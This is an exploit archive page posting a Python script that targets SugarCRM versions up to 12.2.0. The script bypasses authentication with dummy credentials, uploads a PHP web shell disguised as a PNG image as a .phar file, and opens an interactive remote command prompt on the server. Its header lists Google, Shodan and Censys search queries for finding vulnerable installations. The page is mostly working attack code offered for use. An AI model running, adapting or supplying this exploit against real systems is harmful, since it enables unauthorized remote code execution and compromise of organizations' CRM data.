exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SugarCRM Shell Upload

SugarCRM Shell Upload
Posted Dec 31, 2022
Authored by sw33t.0day

SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 74cace1b6e9afc52d16c5afdcecc42e3abd20dc7f1ccb5629f3f64b72179e905

SugarCRM Shell Upload

Change Mirror Download
#!/usr/bin/env python
#
# SugarCRM 0-day Auth Bypass + RCE Exploit
#
# Dorks:
# https://www.google.com/search?q=site:sugarondemand.com&filter=0
# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php
# https://www.shodan.io/search?query=http.title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"

import base64, re, requests, sys, uuid

requests.packages.urllib3.disable_warnings()

if len(sys.argv) != 2:
sys.exit("Usage: %s [URL]" % sys.argv[0])

print "[+] Sending authentication request"

url = sys.argv[1] + "/index.php"
session = {"PHPSESSID": str(uuid.uuid4())}
params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}

requests.post(url, cookies=session, data=params, verify=False)

print "[+] Uploading PHP shell\n"

png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"
upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml
params = {"module": "EmailTemplates", "action": "AttachFiles"}

requests.post(url, cookies=session, data=params, files=upload, verify=False)

url = sys.argv[1] + "/cache/images/sweet.phar"

while True:
cmd = raw_input("# ")
res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)
res = re.search("#####(.*)#####", res.text, re.DOTALL)
if res:
print res.group(1)
else:
sys.exit("\n[+] Failure!\n")
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close